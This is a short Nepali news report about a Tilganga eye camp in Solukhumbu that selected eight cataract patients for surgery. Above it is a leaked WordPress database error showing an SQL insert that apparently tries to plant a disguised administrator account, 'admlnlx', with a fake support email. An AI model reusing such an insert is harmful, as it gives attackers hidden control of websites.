WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$By8lW89n3Foqn.N4KrC9pTmrTBN5.L0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 11:49:53', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बु जिल्लाको माहाकुलुङ गाउँपालिका १ बाट ८ जना मोतिबिन्दुका बिरामी छानिएका छन ।
तिलगंगा आँखा प्रतिष्ठान काठमाण्डौँ र जिल्ला सामुदायिक आँखा केन्द्र फाप्लुको आयोजनामा संचालित शिविरमा ८ जना मोतिबिन्दुका बिरामी छनौट भएका छन।
शिबिरमा १ सय ५९ जनाले आँखा परीक्षण गराएकोमा ३३ जनालाई चस्मा वितरण गरिएको छ भने अन्यलाई निशुल्क औषधी प्रदान गरिएको छ । यहि असोज २४ र २५ गते तिलगंगा आखा प्रतिष्ठानका दक्ष चिकित्सकद्धारा जिल्ला सामुदायिक आँखा केन्द्र फाप्लुमा शल्यक्रिया गरिने छ ।